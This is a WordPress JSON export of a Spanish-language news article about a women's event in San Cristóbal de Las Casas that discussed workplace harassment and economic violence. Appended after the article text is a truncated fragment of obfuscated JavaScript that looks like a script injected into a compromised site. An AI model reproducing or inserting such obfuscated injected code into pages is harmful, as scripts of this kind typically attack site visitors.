{"id":131,"date":"2022-03-05T04:01:00","date_gmt":"2022-03-05T04:01:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=131"},"modified":"2022-03-05T04:01:01","modified_gmt":"2022-03-05T04:01:01","slug":"realizan-proceso-de-reflexion-sobre-acoso-laboral-y-violencia-economica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=131","title":{"rendered":"Realizan proceso de reflexi\u00f3n sobre acoso laboral y violencia econ\u00f3mica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220304-WA0100-1024x768.jpg\" alt=\"\" class=\"wp-image-132\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220304-WA0100-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220304-WA0100-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220304-WA0100-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220304-WA0100.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>04 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Adem\u00e1s de la inseguridad, el acoso laboral y la violencia econ\u00f3mica son los principales problemas que enfrentan las mujeres, lo cual tuvo espacio para la reflexi\u00f3n en \u201cMujeres Abriendo Caminos, Tejiendo Propuestas\u201d, evento que incluy\u00f3 conversatorios y conferencias en torno al D\u00eda Internacional de la Mujer.Al respecto, Donaj\u00ed Garc\u00eda, quien particip\u00f3 como ponente en un conversatorio, se\u00f1al\u00f3 que se habl\u00f3 hablamos sobre defender el primer territorio, \u201cque es nuestro cuerpo, el segundo donde habitamos y tiene que ver un poco de activismo ambiental, adem\u00e1s del sentido de sentirnos seguras en las calles, cuidarnos entre todas nosotras, como nos auto organizamos para mantenernos vivas\u201d.\u201cMe da mucho gusto que el Ayuntamiento organice este tipo de actividades, la mayor\u00eda de asistentes son trabajadoras de aqu\u00ed, me parece que es importante porque todav\u00eda somos muy cerrados respecto al feminismo y conmemorar esta fecha con personas de aqu\u00ed hace esta reflexi\u00f3n m\u00e1s profunda\u201d.Donaj\u00ed Garc\u00eda dijo que es necesario entender el feminismo y y concientizar que salva vidas, \u201cnos salva a nosotras, me gusta que los temas que se llevaron en el panel lo hemos abordado personas que quiz\u00e1 nos hemos dedicado m\u00e1s a la academia o bajo colectivos de mujeres, es interesante c\u00f3mo nos reciben otras mujeres trabajadoras, que razonamos sobre mantenernos a salvo, en vez de ponernos en riesgo\u201d.\u201cVivimos en un sistema que de pronto nos hace que nuestro lugar que habitamos sea con violencia econ\u00f3mica, est\u00e1 comprobado que las mujeres ganamos menos que los hombres, que es doble jornada pues adem\u00e1s de la laboral, la segunda viene en la casa aunque aunque no seamos madres de familia, se puede hacer otras actividades, la doble jornada no se paga, y nos mantiene vivos a todos, ser\u00eda una triple jornada con el activismo\u201d.Finalmente, dijo que pr\u00e1cticamente todas han vivido acoso laboral, \u201cpero no ten\u00edamos conciencia de ello, ten\u00edamos soportar violencia, ahora estamos en un momento de reflexionar que no est\u00e1 bien, que debemos preservar nuestra vida y puestos de trabajo, por la capacidad que tenemos, creo yo, aunque a veces nuestras principales enemigas somos nosotras mismas, pero as\u00ed nos han educado\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 04 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Adem\u00e1s de la inseguridad, el acoso laboral y la violencia econ\u00f3mica son los principales problemas que enfrentan las mujeres, lo cual tuvo espacio para la reflexi\u00f3n en \u201cMujeres Abriendo Caminos, Tejiendo Propuestas\u201d, evento que incluy\u00f3 conversatorios y conferencias en torno al D\u00eda Internacional &hellip;<\/p>\n","protected":false},"author":2,"featured_media":132,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-131","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/131","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=131"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/131\/revisions"}],"predecessor-version":[{"id":133,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/131\/revisions\/133"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/132"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=131"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=131"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}